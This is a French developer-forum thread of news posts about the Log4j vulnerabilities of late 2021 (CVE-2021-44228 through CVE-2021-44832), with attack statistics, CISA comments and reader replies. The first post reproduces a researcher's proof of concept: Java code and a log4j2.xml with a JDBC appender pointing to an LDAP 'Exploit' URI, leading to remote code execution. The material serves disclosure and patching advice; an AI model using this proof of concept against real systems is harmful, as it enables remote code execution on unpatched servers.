    Apache a publié une autre version de Log4j, la version 2.17.1, qui corrige une vulnérabilité d'exécution de code à distance (RCE) nouvellement découverte dans Log4j 2.17.0, suivie comme CVE-2021-44832. Avant celle-ci, Log4j 2.17.0 était la version la plus récente de Log4j et était considérée comme la version la plus sûre pour la mise à niveau, mais ce conseil a maintenant évolué.

    Log4j est une bibliothèque de journalisation open source basée sur Java utilisée dans des millions d'applications. Plus tôt ce mois-ci, une vulnérabilité dans Log4J a été découverte. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance s'il a la capacité de soumettre une donnée à une application qui utilise la bibliothèque log4j pour journaliser l'évènement. Cette attaque peut être réalisée sans être authentifié, par exemple en tirant parti d'une page d'authentification qui journalise les erreurs d'authentification. Les entreprises spécialisées en cybersécurité ont indiqué que le nombre d'attaques profitant de cette faille se multiplient. Les membres de l’Apache Software Fondation ont développé un patch en catastrophe pour corriger la vulnérabilité, la version 2.15.0. Des contournements sont également possibles pour réduire les risques.

    Mais les chercheurs ont signalé qu'il existe au moins deux vulnérabilités dans le correctif, publié sous le nom de Log4J 2.15.0, et que les attaquants exploitent activement l'une d'entre elles ou les deux contre des cibles du monde réel qui ont déjà appliqué la mise à jour. Les chercheurs ont exhorté les organisations à installer un nouveau correctif, publié en tant que version 2.16.0, dès que possible pour corriger la vulnérabilité, qui est suivie comme CVE-2021-45046.

    Le correctif précédent, ont déclaré les chercheurs, « était incomplet dans certaines configurations autres que celles par défaut » et permettait aux attaquants d'effectuer des attaques par déni de service, ce qui facilite généralement la mise hors ligne des services vulnérables jusqu'à ce que les victimes redémarrent leur serveurs ou prennent d'autres mesures. La version 2.16.0 « résout ce problème en supprimant la prise en charge des modèles de recherche de messages et en désactivant la fonctionnalité JNDI par défaut », selon l'avis de vulnérabilité lié ci-dessus.

    La version 2.15.0 ne résolvait pas un autre problème - CVE-2021-45046 - qui permettait à un attaquant distant contrôlant le Thread Context Map (MDC) de préparer une entrée malveillante à l'aide d'un modèle de recherche JNDI. Le résultat pourrait être l'exécution de code à distance, heureusement pas dans tous les environnements.

    La version 2.16.0 a résolu ce problème. Mais elle n'a pas corrigé CVE-2021-45105, que l'Apache Software Foundation décrit comme suit :

    « Les versions 2.0-alpha1 à 2.16.0 d'Apache Log4j2 ne protégeaient pas contre la récursivité incontrôlée des recherches auto-référentielles. Lorsque la configuration de la journalisation utilise une disposition de modèle autre que celle par défaut avec une recherche de contexte (par exemple, $${ctx:loginId}), les attaquants contrôlant les données d'entrée de Thread Context Map (MDC) peuvent créer des données d'entrée malveillantes contenant une recherche récursive, ce qui entraîne une StackOverflowError qui mettra fin au processus. Ceci est également connu sous le nom d'attaque DOS (Denial of Service) ».

    Le programme de primes de bogues indépendant des fournisseurs, Zero Day Initiative, a décrit la faille comme suit :

    « Lorsqu'une variable imbriquée est remplacée par la classe StrSubstitutor, elle appelle récursivement la classe substitut(). Cependant, lorsque la variable imbriquée fait référence à la variable à remplacer, la récursivité est appelée avec la même chaîne. Cela conduit à une récursivité infinie et à une condition DoS sur le serveur ».

    L'ASF a également décrit les mesures d'atténuation suivantes :
    Dans PatternLayout dans la configuration de la journalisation, remplacez les recherches de contexte comme ${ctx:loginId} ou $${ctx:loginId} par les modèles de mappe de contexte de thread (%X, %mdc ou %MDC) .
    Sinon, dans la configuration, supprimez les références aux recherches contextuelles telles que ${ctx:loginId} ou $${ctx:loginId} lorsqu'elles proviennent de sources externes à l'application telles que les en-têtes HTTP ou les entrées utilisateur.

    La faille a été corrigée dans Log4j 2.17.0 (Java 8).

    Une nouvelle mise à jour est disponible

    Un autre bogue critique d'exécution de code à distance qui est maintenant suivi en tant que CVE-2021-44832 a été découvert dans la même bibliothèque de journalisation Apache Log4j. Il s'agit de la quatrième vulnérabilité de la bibliothèque Log4j.

    Classé «*modéré*» en gravité avec un score de 6,6 sur l'échelle CVSS, la vulnérabilité provient du manque de contrôles supplémentaires sur l'accès JDNI dans log4j.

    « JDBC Appender doit utiliser JndiManager lors de l'accès à JNDI. L'accès JNDI doit être contrôlé via une propriété système », est-il indiqué sur la description du problème. «*Lié à CVE-2021-44832 où un attaquant autorisé à modifier le fichier de configuration de journalisation peut construire une configuration malveillante à l'aide d'un appender JDBC avec une source de données référençant un URI JNDI qui peut exécuter du code à distance.*»

    L'équipe de sécurité d'Apache a publié une autre version d'Apache Log4J (version 2.17.1) corrigeant le bogue d'exécution de code à distance CVE-2021-44832 récemment découvert. C'est une autre mauvaise situation pour la plupart des utilisateurs, mais, encore une fois, il est fortement recommandé de mettre son système à jour pour résoudre ce problème critique.

    Le chercheur en sécurité de Checkmarx, Yaniv Nizry, a revendiqué le mérite d'avoir signalé la vulnérabilité d'Apache*:

    Nom : log.png
Affichages : 44786
Taille : 46,8 Ko

    Le tweet de Nizry a rapidement été relayé, attirant des remarques et des mèmes d'experts en sécurité et de «*victimes*» de la fatigue continue des correctifs log4j.

    « J'espère que c'est une blague, j'espère tellement... #log4j », a tweeté un utilisateur en réponse.

    « Nous avons LONGTEMPS dépassé le point où la seule chose responsable à faire est de mettre en place une enseigne au néon clignotante géante qui dit "LOG4J NE PEUT PAS ÊTRE RÉPARÉ, NE L'UTILISEZ PAS POUR RIEN" », a raillé un autre.

    L'expert en sécurité Kevin Beaumont a qualifié l'instance d'autre «*divulgation ratée de Log4j*» pendant la période des congés.

    Nom : kevin.png
Affichages : 8156
Taille : 21,1 Ko

    Une divulgation trop rapide ?

    Au moment du tweet de Nizry, il n'y avait pas encore d'avis ou de mémo officiel indiquant la présence d'un bogue RCE dans log4j 2.17.

    Le tweet lui-même ne contenait aucun détail sur la vulnérabilité ou sur la manière dont elle pourrait être exploitée, mais, en quelques minutes, a conduit un groupe de professionnels de la sécurité et d'internautes à commencer à enquêter sur la réclamation.

    La divulgation prématurée des vulnérabilités de sécurité peut inciter les acteurs malveillants à mener des activités d'analyse et d'exploitation malveillantes, comme en témoigne la fuite d'exploit Log4Shell du 9 décembre.

    Marc Rogers, vice-président de la cybersécurité chez Okta a d'abord révélé l'identifiant de la vulnérabilité (CVE-2021-44832) et que l'exploitation du bogue dépend d'une configuration log4j autre que celle par défaut où la configuration est chargée à partir d'un serveur distant*:

    Nom : marc.png
Affichages : 8172
Taille : 30,0 Ko

    Jusqu'à présent, les vulnérabilités de log4j ont été exploitées par toutes sortes d'acteurs malveillants, des pirates informatiques soutenus par des États aux gangs de ransomware et autres pour injecter des mineurs Monero sur des systèmes vulnérables.

    Le gang de ransomware Conti a été surpris en train de surveiller des serveurs VMWare vCenter vulnérables. Les attaquants qui ont violé la plateforme de cryptographie vietnamienne, ONUS, via log4shell ont exigé une rançon de 5 millions de dollars.

    Les utilisateurs de Log4j doivent immédiatement passer à la dernière version 2.17.1 (pour Java 8). Les versions rétroportées 2.12.4 (Java 7) et 2.3.2 (Java 6) contenant le correctif devraient également être publiées sous peu.

    Détails techniques de la nouvelle faille

    Yaniv Nizry, un chercheur de la société de sécurité Checkmarx a découvert cette vulnérabilité RCE :

    « Étant des chercheurs extrêmement concentrés et dévoués, nous voulions faire nous-mêmes un audit de sécurité sur le package log4j dans l'espoir de trouver quelque chose d'intéressant. Et après une semaine d'examen du code et de tests, nous avons rencontré une nouvelle vulnérabilité de sécurité de désérialisation non découverte. Cette vulnérabilité n'utilise pas la fonction de recherche désactivée. La complexité de cette vulnérabilité est plus élevée que la CVE-2021-44228 d'origine car elle nécessite que l'attaquant ait le contrôle de la configuration (comme la vulnérabilité «*logback*» CVE-2021-42550). Contrairement à logback, dans log4j, il existe une fonctionnalité permettant de charger un fichier de configuration à distance ou de configurer l'enregistreur via le code, de sorte qu'une exécution de code arbitraire pourrait être réalisée avec une attaque MITM, l'entrée de l'utilisateur se retrouvant dans une variable de configuration vulnérable ou en modifiant le fichier de configuration.

    « En examinant les fonctionnalités de log4j, nous sommes tombés sur les fonctionnalités «*Appender*». Les appenders sont essentiellement l'endroit où sortir les journaux, nous avons donc par exemple ConsoleAppender, FileAppender, etc.

    « Le JDBCAppender a attiré notre attention car il existe des moyens publics d'obtenir RCE via la désérialisation Java JDBC (voir cette conférence Blackhat de Yongtao Wang, Lucas Zhang et Kunzhe Chai pour plus d'informations.)

    « Mais avant d'aborder la désérialisation JDBC dans log4j, nous avons remarqué que dans la documentation il existe un moyen de configurer log4j pour qu'il récupère la source de la base de données dynamiquement et à distance via JNDI ».

    Il a également donné des étapes à reproduire, notamment la récupération de la configuration à distance via HTTP*:

    Code Java : Sélectionner tout - Visualiser dans une fenêtre à part
    System.setProperty("log4j2.configurationFile","http://127.0.0.1:8888/log4j2.xml");

    En utilisant le même serveur LDAP (Lightweight Directory Access Protocol) que dans le PoC (Proof of Concept) CVE-2021-44228, tout ce que nous avons à faire est d'exécuter*:

    Code Java : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    //log4j.java
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
     
    public class log4j {
        static {
            System.setProperty("log4j2.configurationFile","http://127.0.0.1:8888/log4j2.xml");
            System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
        }
        private static final Logger logger = LogManager.getLogger(log4j.class);
     
        public static void main(String[] args) {
        }
    }

    Et pour servir le log4j2.xml suivant*:

    Code XML : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    <?xml version="1.0" encoding="UTF-8"?>
    <Configuration status="error">
        <Appenders>
            <JDBC name="databaseAppender" tableName="dbo.application_log">
                <DataSource jndiName="ldap://127.0.0.1:1389/Exploit" />
                <Column name="eventDate" isEventTimestamp="true" />
                <Column name="level" pattern="%level" />
                <Column name="logger" pattern="%logger" />
                <Column name="message" pattern="%message" />
                <Column name="exception" pattern="%ex{full}" />
            </JDBC>
        </Appenders>
        <Loggers>
            <Root level="warn">
                <AppenderRef ref="databaseAppender"/>
            </Root>
        </Loggers>
    </Configuration>

    Quels résultats attendre ? Lors de l'initialisation de l'objet logger, une requête au log4j2.xml distant sera effectuée. Dans le processus de chargement, une tentative de chargement de l'objet DataSource fera une requête au serveur LDAP qui redirigera alors vers une classe malveillante. À la fin, la classe arbitraire sera désérialisée et exécutée.

    Pourquoi est-ce critique ? « L'impact de la vulnérabilité log4shell (alias CVE-2021-44228) sur l'industrie était important, et un large éventail d'organisations ont déclaré avoir été affectées. Cela démontre la grande échelle des entreprises qui utilisent log4j dans leurs écosystèmes. L'équipe log4j d'Apache a travaillé dur pour ajouter des correctifs de sécurité à la dernière version de log4j (2.17.0) pour désactiver les recherches et autoriser une liste de protocoles/hôtes. Comme vous pouvez le voir, en utilisant un vecteur d'attaque différent, il est toujours possible de réaliser une exécution de code arbitraire en utilisant la configuration par défaut ».

    Source : Checkmarx
    Contribuez au club : Corrections, suggestions, critiques, ... : Contactez le service news et Rédigez des actualités

  15. #55
    Membre éclairé
    Homme Profil pro
    Développeur C++
    Inscrit en
    Octobre 2008
    Messages
    242
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Bas Rhin (Alsace)

    Informations professionnelles :
    Activité : Développeur C++

    Informations forums :
    Inscription : Octobre 2008
    Messages : 242
    Points : 705
    Points
    705
    Par défaut
    4 vulnérabilités pour une bibliothèque de logs. C'est le problème de la communauté Java, l'over engineering à outrance. Quand tu vois que log4j est capable de se connecter à une base de données tu as des questions à te poser.

  16. #56
    Membre expérimenté
    Homme Profil pro
    retraité
    Inscrit en
    Septembre 2014
    Messages
    604
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : retraité

    Informations forums :
    Inscription : Septembre 2014
    Messages : 604
    Points : 1 441
    Points
    1 441
    Par défaut
    Citation Envoyé par marsupial Voir le message
    Si à chaque faille découverte on devait tout jeter, on retourne à la machine à écrire. Plus de 60 000 failles logicielles découvertes en un an(source dvp) , personne n'est épargné.
    Cette faille est massivement mondiale, ça change tout.

  17. #57
    Expert éminent Avatar de marsupial
    Homme Profil pro
    Retraité
    Inscrit en
    Mars 2014
    Messages
    1 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Autre

    Informations professionnelles :
    Activité : Retraité

    Informations forums :
    Inscription : Mars 2014
    Messages : 1 760
    Points : 7 185
    Points
    7 185
    Par défaut
    La faille aussi massive et mondiale soit-elle n'en reste pas moins une mauvaise excuse pour jeter Java et Apache comme le faisait mon vdd au commentaire que tu as cité. Si tu savais le nombre de vulnérabilités dans PHP...

    D'ailleurs la Maison Blanche a déclaré la sécurité de l'open source question de sécurité nationale et va réunir courant du mois de Janvier tous les acteurs ayant de près ou de loin à faire avec l'open source.

    source Bloomberg du 23 Décembre et 01net du 27 décembre
    Repeat after me
    Le monsieur lutte pour la défense des libertés individuelles et collectives

    Repeat after me...

  18. #58
    Communiqués de presse

    Femme Profil pro
    Rédacteur technique
    Inscrit en
    Mai 2018
    Messages
    2 132
    Détails du profil
    Informations personnelles :
    Sexe : Femme
    Âge : 33
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Rédacteur technique
    Secteur : Communication - Médias

    Informations forums :
    Inscription : Mai 2018
    Messages : 2 132
    Points : 158 207
    Points
    158 207
    Par défaut Les cyberattaques ont augmenté de 50 % en 2021, avec un pic en décembre, à cause de la faille dans Log4J
    Les cyberattaques ont augmenté de 50 % en 2021 et atteint un pic en décembre, à cause de la faille qui a impacté la bibliothèque logicielle Log4J, d'après une analyse Check Point Research

    En ce début d’année, Check Point Research (CPR) partage les statistiques mondiales des augmentations de cyberattaques observées en 2021 par région, pays et industrie. L'année dernière, CPR a constaté une augmentation de 50 % des cyberattaques par semaine sur les réseaux d'entreprise par rapport à 2020, avec un pic en décembre, en grande partie dû à la faille de sécurité qui a impacté Log4J.

    Les pirates ont surtout ciblé l'Afrique, l'Asie-Pacifique et l'Amérique latine, mais l'Europe a connu la plus forte augmentation en pourcentage des cyberattaques d'une année sur l'autre. Le secteur de l'éducation et de la recherche est le plus ciblé au monde.

    • Les cyberattaques contre le secteur de l'éducation et de la recherche ont augmenté de 75 % en 2021.
    • Les cyberattaques contre le secteur public ont augmenté de 47 % en 2021.
    • Les cyberattaques contre le secteur de la santé ont augmenté de 71 % en 2021.


    Check Point Research (CPR) partage les statistiques mondiales des augmentations des cyberattaques contre les organisations en 2021 par région, pays et secteur d'activité. L'année dernière, CPR a constaté 50 % de cyberattaques en plus par semaine sur les réseaux d'entreprise par rapport à 2020. La tendance à l'augmentation des cyberattaques a atteint un niveau record fin 2021 après les révélations de l'exploit Log4J, avec un pic à 925 cyberattaques par semaine et par organisation, au niveau mondial.

    Nom : image001.png
Affichages : 2882
Taille : 28,7 Ko

    Les secteurs les plus ciblés par les pirates informatiques dans le monde en 2021

    1 - Enseignement/Recherche (+75%)
    2 - Gouvernement/Militaire (+47%)
    3 - Communications (+51%)
    4 - ISP/MSP (67%)
    5 - Santé (71%)

    Nom : image002.png
Affichages : 1958
Taille : 63,6 Ko

    Régions les plus visées

    1 - Afrique (+13%)
    2 - Asie Pacifique (+25%)
    3 - Amérique Latine
    4 - Europe (+68%)
    5 - Amérique du Nord (+61%)

    Nom : image003.png
Affichages : 1926
Taille : 30,6 Ko

    Déclaration d'Omer Dembinsky, responsable de la recherche sur les données, chez Check Point Software :

    « Les pirates informatiques ne cessent d'innover. L'année dernière, nous avons constaté une augmentation stupéfiante de 50 % des cyberattaques perpétrées chaque semaine, sur les réseaux d'entreprise par rapport à 2020 - c'est une augmentation considérable. Le nombre de cyberattaques a atteint un pic vers la fin de l'année, en grande partie en raison de la faille de sécurité qui a touché la bibliothèque Log4J. Grâce aux nouvelles techniques d’intrusion et aux méthodes d'évasion, les pirates peuvent désormais mettre plus facilement à exécution leurs intentions malveillantes. Ce qui est plus alarmant, c'est que certains secteurs essentiels de la société (les OIV) figurent dans la liste des cibles. Les secteurs de l'éducation, de l'administration et de la santé figurent dans le top 5 des secteurs les plus attaqués au niveau mondial. Je m'attends à ce que ces chiffres augmentent en 2022, car les pirates continueront d'innover et de trouver de nouvelles méthodes pour exécuter des cyberattaques, en particulier des ransomwares. Pour ainsi dire, nous sommes dans une cyber pandémie. J'invite instamment le public, et en particulier les personnes travaillant dans les secteurs de l'éducation, de l'administration et de la santé, à se familiariser avec les principes de base de la cyber protection. Des mesures simples telles que l'application de correctifs, la segmentation des réseaux et la formation des employés peuvent contribuer grandement à rendre le monde plus sûr. »

    Conseils de sécurité :

    • Prévenir
    • Tout sécuriser
    • Appliquer régulièrement des correctifs
    • Segmenter les réseaux
    • Former les employés
    • Installer des technologies de sécurité avancées


    Les données utilisées dans ce rapport ont été détectées par les technologies Threat Prevention de Check Point, puis stockées et analysées dans ThreatCloud. ThreatCloud fournit des renseignements sur les menaces en temps réel provenant de centaines de millions de capteurs dans le monde entier, sur les réseaux, les terminaux et les mobiles. ThreatCloud est en fait le cerveau qui se cache derrière la puissance de prévention des menaces de Check Point Software, il combine les renseignements sur les menaces du Big Data avec des technologies avancées d'IA pour fournir une prévention précise à tous les clients de Check Point Software.

    Source : Check Point Research

    Et vous ?

    Trouvez-vous cette analyse pertinente ?

    Voir aussi :

    95 000 cyberattaques ont été recensées cette année, une augmentation de 45 398 par rapport à 2020, les grandes entreprises étant les plus ciblées, selon Orange Cyberdefense

    Les ransomwares ont augmenté de 62 % depuis 2019, avec un pic de 158 % en Amérique du Nord, les cybercriminels utilisant des tactiques plus sophistiquées et des variantes plus dangereuses comme Ryuk

    Les entreprises de taille moyenne sont 490 % plus susceptibles d'être victimes d'une atteinte à la vie privé, dû au manque de ressources et au coût élevé des expertises, selon Coro
    Publication de communiqués de presse en informatique. Contribuez au club : corrections, suggestions, critiques, ... Contactez le service news et Rédigez des actualités

  19. #59
    Chroniqueur Actualités

    Homme Profil pro
    Administrateur de base de données
    Inscrit en
    Mars 2013
    Messages
    8 385
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Canada

    Informations professionnelles :
    Activité : Administrateur de base de données

    Informations forums :
    Inscription : Mars 2013
    Messages : 8 385
    Points : 196 439
    Points
    196 439
    Par défaut Log4j : la directrice du CISA s'attend à des retombées de la faille qui vont s'étendre sur des années
    Log4j : la directrice du CISA s'attend à des retombées de la faille qui vont s'étendre sur des années
    et servir à des intrusions futures dans les systèmes des entreprises

    Les professionnels de la sécurité seront confrontés aux retombées du bogue Log4j pendant longtemps, ont déclaré lundi de hauts responsables de la Cybersecurity and Infrastructure Security Agency (CISA). Si elle n'est pas corrigée ou autrement non corrigée, la faille de sécurité majeure découverte il y a un mois dans la bibliothèque de journalisation Java Apache Log4j présente des risques pour d'énormes pans d'Internet. La vulnérabilité du logiciel largement utilisé pourrait être exploitée par des cyberattaquants pour s'emparer de serveurs informatiques, mettant potentiellement tout, de l'électronique grand public aux systèmes gouvernementaux et d'entreprise, en danger de cyberattaque.

    Le 9 décembre, une vulnérabilité a été découverte dans la bibliothèque de journalisation Apache log4j. Cette bibliothèque est très souvent utilisée dans les projets de développement d'application Java/J2EE ainsi que par les éditeurs de solutions logicielles sur étagère basées sur Java/J2EE.

    Log4j inclut un mécanisme de recherche qui pourrait être utilisé pour effectuer des requêtes via une syntaxe spéciale dans une chaîne de format. Par exemple, il peut être utilisé pour demander divers paramètres comme la version de l'environnement Java via ${java:version}, etc. Ensuite, en spécifiant la clé jndi dans la chaîne, le mécanisme de recherche utilise l'API JNDI. Par défaut, toutes les requêtes sont effectuées en utilisant le préfixe java:comp/env/*; cependant, les auteurs ont implémenté l'option d'utiliser un préfixe personnalisé au moyen d'un symbole deux-points dans la clé. C'est là que réside la vulnérabilité : si jndi:ldap:// est utilisé comme clé, la requête va au serveur LDAP spécifié. D'autres protocoles de communication, tels que LDAPS, DNS et RMI, peuvent également être utilisés.

    Ainsi, un serveur distant contrôlé par un attaquant pourrait renvoyer un objet à un serveur vulnérable, entraînant potentiellement l'exécution de code arbitraire dans le système ou la fuite de données confidentielles. Tout ce qu'un attaquant doit faire est d'envoyer une chaîne spéciale via le mécanisme qui écrit cette chaîne dans un fichier journal et est donc gérée par la bibliothèque Log4j. Cela peut être fait avec de simples requêtes HTTP, par exemple, celles envoyées via des formulaires Web, des champs de données, etc., ou avec tout autre type d'interactions utilisant la journalisation côté serveur.

    La vulnérabilité a été caractérisé par Tenable comme « la vulnérabilité la plus importante et la plus critique de la dernière décennie ».

    Des preuves de concept ont déjà été publiées. Cette vulnérabilité fait l'objet d'une exploitation active.

    La sévérité de la brèche est maximale 10 sur l’échelle CVSS.

    Elle permet donc à un attaquant de provoquer une exécution de code arbitraire à distance s'il a la capacité de soumettre une donnée à une application qui utilise la bibliothèque log4j pour journaliser l'évènement. Cette attaque peut être réalisée sans être authentifié, par exemple en tirant parti d'une page d'authentification qui journalise les erreurs d'authentification. Les entreprises spécialisées en cybersécurité ont indiqué que le nombre d'attaques profitant de cette faille se multiplient. Les membres de l’Apache Software Fondation ont développé un patch en catastrophe pour corriger la vulnérabilité, la version 2.15.0. Des contournements sont également possibles pour réduire les risques.

    Mais les chercheurs ont signalé qu'il existe au moins deux vulnérabilités dans le correctif, publié sous le nom de Log4J 2.15.0, et que les attaquants exploitent activement l'une d'entre elles ou les deux contre des cibles du monde réel qui ont déjà appliqué la mise à jour. Les chercheurs ont exhorté les organisations à installer un nouveau correctif, publié en tant que version 2.16.0, dès que possible pour corriger la vulnérabilité, qui est suivie comme CVE-2021-45046.

    Le correctif précédent, ont déclaré les chercheurs, « était incomplet dans certaines configurations autres que celles par défaut » et permettait aux attaquants d'effectuer des attaques par déni de service, ce qui facilite généralement la mise hors ligne des services vulnérables jusqu'à ce que les victimes redémarrent leur serveurs ou prennent d'autres mesures. La version 2.16.0 « résout ce problème en supprimant la prise en charge des modèles de recherche de messages et en désactivant la fonctionnalité JNDI par défaut », selon l'avis de vulnérabilité lié ci-dessus.

    La version 2.15.0 ne résolvait pas un autre problème - CVE-2021-45046 - qui permettait à un attaquant distant contrôlant le Thread Context Map (MDC) de préparer une entrée malveillante à l'aide d'un modèle de recherche JNDI. Le résultat pourrait être l'exécution de code à distance, heureusement pas dans tous les environnements.

    La version 2.16.0 a résolu ce problème. Mais elle n'a pas corrigé CVE-2021-45105, que l'Apache Software Foundation décrit comme suit :

    « Les versions 2.0-alpha1 à 2.16.0 d'Apache Log4j2 ne protégeaient pas contre la récursivité incontrôlée des recherches auto-référentielles. Lorsque la configuration de la journalisation utilise une disposition de modèle autre que celle par défaut avec une recherche de contexte (par exemple, $${ctx:loginId}), les attaquants contrôlant les données d'entrée de Thread Context Map (MDC) peuvent créer des données d'entrée malveillantes contenant une recherche récursive, ce qui entraîne une StackOverflowError qui mettra fin au processus. Ceci est également connu sous le nom d'attaque DOS (Denial of Service) ».

    Le programme de primes de bogues indépendant des fournisseurs, Zero Day Initiative, a décrit la faille comme suit :

    « Lorsqu'une variable imbriquée est remplacée par la classe StrSubstitutor, elle appelle récursivement la classe substitut(). Cependant, lorsque la variable imbriquée fait référence à la variable à remplacer, la récursivité est appelée avec la même chaîne. Cela conduit à une récursivité infinie et à une condition DoS sur le serveur ».

    L'ASF a également décrit les mesures d'atténuation suivantes :
    • Dans PatternLayout dans la configuration de la journalisation, remplacez les recherches de contexte comme ${ctx:loginId} ou $${ctx:loginId} par les modèles de mappe de contexte de thread (%X, %mdc ou %MDC) .
    • Sinon, dans la configuration, supprimez les références aux recherches contextuelles telles que ${ctx:loginId} ou $${ctx:loginId} lorsqu'elles proviennent de sources externes à l'application telles que les en-têtes HTTP ou les entrées utilisateur.

    La faille a été corrigée dans Log4j 2.17.0 (Java 8).

    Un autre bogue critique d'exécution de code à distance qui est maintenant suivi en tant que CVE-2021-44832 a été découvert dans la même bibliothèque de journalisation Apache Log4j. Il s'agit de la quatrième vulnérabilité de la bibliothèque Log4j.

    Classé « modéré » en gravité avec un score de 6,6 sur l'échelle CVSS, la vulnérabilité provient du manque de contrôles supplémentaires sur l'accès JDNI dans log4j.

    L'équipe de sécurité d'Apache a publié une autre version d'Apache Log4J (version 2.17.1) corrigeant le bogue d'exécution de code à distance CVE-2021-44832 récemment découvert. C'est une autre mauvaise situation pour la plupart des utilisateurs, mais, encore une fois, il est fortement recommandé de mettre son système à jour pour résoudre ce problème critique.

    Nom : log4j.png
Affichages : 23367
Taille : 25,3 Ko

    La prise de parole du CISA

    Aucune agence fédérale américaine n'a été compromise en raison de la vulnérabilité, a déclaré lundi la directrice de la CISA, Jen Easterly, aux journalistes lors d'un appel. En outre, aucune cyberattaque majeure impliquant le bogue n'a été signalée aux États-Unis, bien que de nombreuses attaques ne soient pas signalées, a-t-elle déclaré.

    Easterly a déclaré que l'étendue de la vulnérabilité, qui affecte des dizaines de millions d'appareils connectés à Internet, en fait la pire qu'elle ait vue dans sa carrière. Il est possible, a-t-elle dit, que les attaquants attendent leur heure, attendant que les entreprises et autres baissent leurs défenses avant d'attaquer.

    « Nous nous attendons à ce que Log4Shell soit utilisé dans les intrusions dans le futur », a déclaré Easterly. Elle a noté la violation de données d'Equifax en 2017, qui a compromis les informations personnelles de près de 150 millions d'Américains, découlait d'une vulnérabilité dans un logiciel open source.

    Jusqu'à présent, la plupart des tentatives d'exploitation du bogue se sont concentrées sur le minage de crypto-monnaies de bas niveau ou sur des tentatives d'attirer des appareils dans des botnets, a-t-elle déclaré.

    L'une des premières attaques connues utilisant la vulnérabilité impliquait le jeu informatique Minecraft. Les attaquants ont pu s'emparer de l'un des serveurs du jeu de construction du monde avant que Microsoft, propriétaire de Minecraft, ne corrige le problème.

    Il y a eu de grosses attaques ailleurs. Le ministère belge de la défense a déclaré le 16 décembre avoir découvert une attaque sur son réseau informatique. L'attaque a paralysé certaines activités du ministère. « La Défense a découvert une attaque sur son réseau informatique avec accès à Internet. Des mesures de quarantaine ont été rapidement prises pour isoler les parties touchées. Cette attaque fait suite à l'exploitation de la vulnérabilité Log4j, qui a été rendue publique la semaine dernière et pour laquelle les spécialistes informatiques du monde entier s'engouffrent dans la brèche », a déclaré Olivier Severin le porte-parole du ministère.

    Source : entretien avec la Directrice du CISA Jen Easterly
    Contribuez au club : Corrections, suggestions, critiques, ... : Contactez le service news et Rédigez des actualités

  20. #60
    Membre chevronné

    Homme Profil pro
    Consultant informatique
    Inscrit en
    Avril 2015
    Messages
    438
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Vendée (Pays de la Loire)

    Informations professionnelles :
    Activité : Consultant informatique
    Secteur : Finance

    Informations forums :
    Inscription : Avril 2015
    Messages : 438
    Points : 1 939
    Points
    1 939
    Par défaut
    C'est ce qui m'a toujours effrayé lorsque j'ai assisté à l'explosion des bibliothèques et plateformes en ligne. Pour avoir commis une fois un bug dans une librairie partagée, je mesure pleinement l'impact que ça peut avoir. Là, j'avais encore la main dessus, et sur l'ensemble des applications qui l'utilisaient et ça a quand même fait des dégâts. Mais si elle avait été lâchée dans la nature... à moi la peur !
    J'ai l'impression que nous avons perdu la tête. Toutes les entreprises ne font pas du commerce en ligne, toutes n'ont pas besoin d'un cloud externe et beaucoup bénéficieraient des services d'un bon analyste bien plus que d'une SSII avide de rentabilité - pour elle-même.

Discussions similaires

  1. Réponses: 5
    Dernier message: 27/10/2009, 05h24
  2. Profiling des applications Java
    Par menzlitsh dans le forum Eclipse Java
    Réponses: 3
    Dernier message: 26/10/2009, 15h46
  3. Réponses: 1
    Dernier message: 19/10/2009, 13h25
  4. Plesk, CPanel & co pour des applications java: possible?
    Par Tourix dans le forum Serveurs (Apache, IIS,...)
    Réponses: 3
    Dernier message: 12/01/2007, 12h46
  5. [Architecture][Stratégie] Que pensez-vous des applications Java online ?
    Par Francoisvandenbergh dans le forum Général Java
    Réponses: 19
    Dernier message: 24/02/2006, 16h49

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo